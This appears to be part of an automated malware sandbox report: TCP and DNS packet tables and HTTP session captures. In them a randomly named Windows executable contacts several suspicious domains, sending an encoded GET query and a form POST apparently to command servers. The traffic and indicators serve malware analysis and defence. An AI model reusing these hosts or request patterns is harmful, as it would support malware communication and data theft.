                          Jul 18, 2024 07:58:19.096050024 CEST8049727172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:19.096163988 CEST4972780192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:19.718575001 CEST4972780192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:20.755857944 CEST4972980192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:20.826809883 CEST8049729172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:20.826919079 CEST4972980192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:20.857610941 CEST4972980192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:20.862704039 CEST8049729172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:21.769669056 CEST8049729172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:21.770622015 CEST8049729172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:21.770674944 CEST4972980192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:22.374763966 CEST4972980192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:23.412152052 CEST4973080192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:23.420867920 CEST8049730172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:23.424576998 CEST4973080192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:23.449057102 CEST4973080192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:23.453990936 CEST8049730172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:23.454330921 CEST8049730172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:24.374906063 CEST8049730172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:24.375233889 CEST8049730172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:24.375288963 CEST4973080192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:24.952591896 CEST4973080192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:25.995946884 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.001988888 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.002106905 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.022748947 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.027837038 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.973881006 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.974126101 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.978009939 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.983998060 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.988910913 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:32.055438995 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.060395002 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.060501099 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.085448027 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.090435982 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.533335924 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.533421040 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:33.593405962 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:33.598728895 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:34.631131887 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.636264086 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:34.636362076 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.660021067 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.665194988 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:35.095482111 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:35.096684933 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:36.171363115 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:36.176816940 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.208889961 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.218674898 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.218792915 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.243310928 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.249099970 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.249125957 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.683837891 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.683923960 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:38.749742985 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:38.754853010 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:39.789879084 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.795445919 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:39.798032045 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.821866989 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.826778889 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.281903028 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.281924963 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.282073975 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:40.292316914 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:40.297025919 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:45.341984034 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.347134113 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:45.347213030 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.371663094 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.382904053 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:46.875735044 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:46.881392002 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:46.881505966 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.911711931 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.916728973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:47.916817904 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.945039034 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.949876070 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249067068 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249186993 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249200106 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249316931 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.250176907 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250190973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250246048 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.250957012 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250972033 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.251013994 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.252002954 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252017975 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252072096 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.252736092 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252787113 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.257628918 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.257930040 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.261917114 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.323869944 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324078083 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324090004 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324131012 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.324981928 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324994087 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325043917 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.325722933 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325735092 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325776100 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.326632977 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.326647043 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.326694965 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.327544928 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.327558994 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.327610016 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.328470945 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.328490973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.328542948 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.329376936 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329391003 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329401970 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329442024 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.329477072 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.330296040 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.330307961 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.330604076 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.331221104 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331234932 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331301928 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.331892967 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331906080 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331957102 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.410479069 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410705090 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410718918 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410770893 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.411499023 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.411604881 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.411715031 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.411766052 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.452770948 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.495199919 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.500272036 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:50.500379086 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.530704975 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.535691023 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:50.536400080 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685472965 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685550928 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685564995 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685646057 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.686371088 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.686383963 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.686429977 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.687326908 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.687342882 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.687448025 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.688256025 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.688271046 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.688345909 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.689065933 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.689390898 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.690507889 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.690651894 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.692540884 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.773096085 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773308992 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773323059 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773377895 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.774104118 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774117947 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774203062 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.774821043 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774833918 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774945021 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.775758982 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.775774956 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.775839090 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.776659012 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.776674986 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.776755095 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.777667046 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.777682066 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.777791977 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.778501034 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778516054 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778527021 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778594971 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.778594971 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.779432058 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.779447079 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.779934883 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.780344009 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780356884 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780371904 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780435085 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.817161083 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817253113 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.817328930 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817342043 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817414045 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.860584974 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.860773087 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.860785007 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861181021 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861211061 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.861259937 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861408949 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:52.984461069 CEST4973880192.168.2.6162.159.134.42

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 18, 2024 07:57:56.985517025 CEST6302653192.168.2.61.1.1.1
                          Jul 18, 2024 07:57:57.078061104 CEST53630261.1.1.1192.168.2.6
                          Jul 18, 2024 07:58:17.901588917 CEST5147653192.168.2.61.1.1.1
                          Jul 18, 2024 07:58:18.168797016 CEST53514761.1.1.1192.168.2.6
                          Jul 18, 2024 07:58:32.026201010 CEST5199353192.168.2.61.1.1.1
                          Jul 18, 2024 07:58:32.044218063 CEST53519931.1.1.1192.168.2.6
                          Jul 18, 2024 07:58:45.320662975 CEST5875353192.168.2.61.1.1.1
                          Jul 18, 2024 07:58:45.332350016 CEST53587531.1.1.1192.168.2.6

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 18, 2024 07:57:56.985517025 CEST192.168.2.61.1.1.10x71c4Standard query (0)www.scottifqqy.onlineA (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:17.901588917 CEST192.168.2.61.1.1.10x9b11Standard query (0)www.ancuapengiu28.comA (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:32.026201010 CEST192.168.2.61.1.1.10xfa30Standard query (0)www.techacademy.storeA (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:45.320662975 CEST192.168.2.61.1.1.10xaf69Standard query (0)www.goodneighbor.clubA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 18, 2024 07:57:57.078061104 CEST1.1.1.1192.168.2.60x71c4No error (0)www.scottifqqy.online185.179.189.181A (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:18.168797016 CEST1.1.1.1192.168.2.60x9b11No error (0)www.ancuapengiu28.comancuapengiu28.comCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 07:58:18.168797016 CEST1.1.1.1192.168.2.60x9b11No error (0)ancuapengiu28.com172.96.191.69A (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:32.044218063 CEST1.1.1.1192.168.2.60xfa30No error (0)www.techacademy.store13.248.169.48A (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:32.044218063 CEST1.1.1.1192.168.2.60xfa30No error (0)www.techacademy.store76.223.54.146A (IP address)IN (0x0001)false
                          Jul 18, 2024 07:58:45.332350016 CEST1.1.1.1192.168.2.60xaf69No error (0)www.goodneighbor.clubgoodneighbor.clubCNAME (Canonical name)IN (0x0001)false
                          Jul 18, 2024 07:58:45.332350016 CEST1.1.1.1192.168.2.60xaf69No error (0)goodneighbor.club162.159.134.42A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.scottifqqy.online
                          • www.ancuapengiu28.com
                          • www.techacademy.store
                          • www.goodneighbor.club

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649726185.179.189.181805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:57:57.118083000 CEST432OUTGET /midu/?hR1p0=vfrlb&zRU=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.scottifqqy.online
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Jul 18, 2024 07:57:57.804214001 CEST1236INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 05:57:57 GMT
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 7742
                          Connection: close
                          Cache-Control: no-cache, no-store, must-revalidate
                          Expires: Thu, 18 Jul 2024 05:57:57 GMT
                          Set-Cookie: _subid=1eic6uc8re5; expires=Sun, 18 Aug 2024 05:57:57 GMT; path=/
                          Set-Cookie: 4c7a9=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQzODFcIjoxNzIxMjgyMjc3fSxcImNhbXBhaWduc1wiOntcIjE0MTFcIjoxNzIxMjgyMjc3fSxcInRpbWVcIjoxNzIxMjgyMjc3fSJ9.cEgJxTru3VcGj36LkfpVAwnt-DXFVVdTf6UD0PkBIFs; expires=Fri, 03 Feb 2079 11:55:54 GMT; path=/
                          Set-Cookie: a90624f7lp1411=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiODA2In0.k6xjJGpwMm2_CBJwU3JzuC-mEUO2nVnQcsQIqhR59a8; expires=Fri, 09 May 198397 02:57:57 GMT; path=/
                          Set-Cookie: a90624f7lp1411ip=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCI4LjQ2LjEyMy4zM1wiIn0.8p3iaUjw-d2CpKgR-5Ws_zhLYUW2RmptlB9M-1uFdK4; expires=Fri, 09 May 198397 02:57:57 GMT; path=/
                          Vary: Accept-Encoding
                          Access-Control-Allow-Origin: *
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 2f 6e 6f 76 69 65 2d 7a 61 63 6f 6e 69 2d 73 2d 31 2d 69 79 75 6e 79 61 2d 32 30 32 34 2d 67 6f 64 61 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b0 d0 b6 d0 bd d1 8b d0 b5 20 d0 bd d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20
                          Data Ascii: <!DOCTYPE html> <html> <head><base href="/lander/novie-zaconi-s-1-iyunya-2024-goda/index.html"> <title> </title> <meta charset="UTF-8"> <meta
                          Jul 18, 2024 07:57:57.804285049 CEST1236INData Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                          Data Ascii: http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <span id="0aa54c9b-2ec8-d0f0-247f-aebdff4fa0d5"></span> <script src="policy/validator.js"></script>
                          Jul 18, 2024 07:57:57.804322958 CEST1236INData Raw: bd d1 8b d0 bc 20 d0 bc d0 b0 d1 80 d1 88 d1 80 d1 83 d1 82 d0 b0 d0 bc 2e 20 d0 92 d1 81 d0 b5 20 d0 be d0 bd d0 b8 20 d0 b1 d1 83 d0 b4 d1 83 d1 82 20 d0 be d0 b1 d1 8f d0 b7 d0 b0 d0 bd d1 8b 20 d0 bf d1 80 d0 be d0 b9 d1 82 d0 b8 20 d0 b0 d1
                          Data Ascii: . .<b
                          Jul 18, 2024 07:57:57.805236101 CEST672INData Raw: d0 bd d1 8b d0 b5 20 d0 bd d0 b5 d1 80 d0 b0 d0 b1 d0 be d1 87 d0 b8 d0 b5 20 d0 b4 d0 bd d0 b8 20 d0 b1 d1 83 d0 b4 d1 83 d1 82 20 d1 82 d0 be d0 bb d1 8c d0 ba d0 be 20 d0 b2 20 d0 bd d0 be d1 8f d0 b1 d1 80 d0 b5 2e 3c 62 72 20 2f 3e 0d 0a 3c
                          Data Ascii: .<br /><br /> <br /> 1
                          Jul 18, 2024 07:57:57.805274010 CEST1236INData Raw: d1 83 d1 87 d0 b5 d1 82 d0 b0 2c 20 d0 bf d0 be 20 d0 bc d0 b5 d1 81 d1 82 d1 83 20 d0 bf d0 be d1 81 d0 bb d0 b5 d0 b4 d0 bd d0 b5 d0 b9 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d0 b8 2e 20 d0 a0 d0 b5 d0 b7 d0 b8 d0 b4 d0
                          Data Ascii: , . , ,
                          Jul 18, 2024 07:57:57.806301117 CEST1236INData Raw: d0 b5 20 d0 bd d0 b0 d1 80 d1 83 d1 88 d0 b5 d0 bd d0 b8 d0 b5 20 d1 88 d1 82 d1 80 d0 b0 d1 84 20 d1 83 d0 b2 d0 b5 d0 bb d0 b8 d1 87 d0 b8 d0 b2 d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d0 b4 d0 be 20 32 30 20 d1 82 d1 8b d1 81 2e 20 d1 80 d1 83 d0 b1
                          Data Ascii: 20 . .<br /><br /> , ,
                          Jul 18, 2024 07:57:57.806314945 CEST1236INData Raw: d1 83 d1 87 d0 b0 d1 81 d1 82 d0 bd d0 b8 d0 ba d0 b8 2e 20 d0 9a d1 83 d0 b4 d0 b0 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d0 be d1 82 d0 bd d0 b5 d1 81 d1 82 d0 b8 20 d0 bc d0 b5 d0 bb d0 be d1 87 d1 8c 2c 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d0 bf
                          Data Ascii: . , .<br /><br /> ,
                          Jul 18, 2024 07:57:57.806349993 CEST690INData Raw: 81 d0 be d0 b3 d0 bb d0 b0 d1 88 d0 b0 d0 b5 d1 82 d0 b5 d1 81 d1 8c 20 d1 81 20 d0 bd d0 b0 d1 88 d0 b5 d0 b9 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65
                          Data Ascii: <a style="color: #149dcc; text-decoration: none;" href="./policy.html"> </a>.</


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649727172.96.191.69805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:18.202198982 CEST702OUTPOST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 208
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
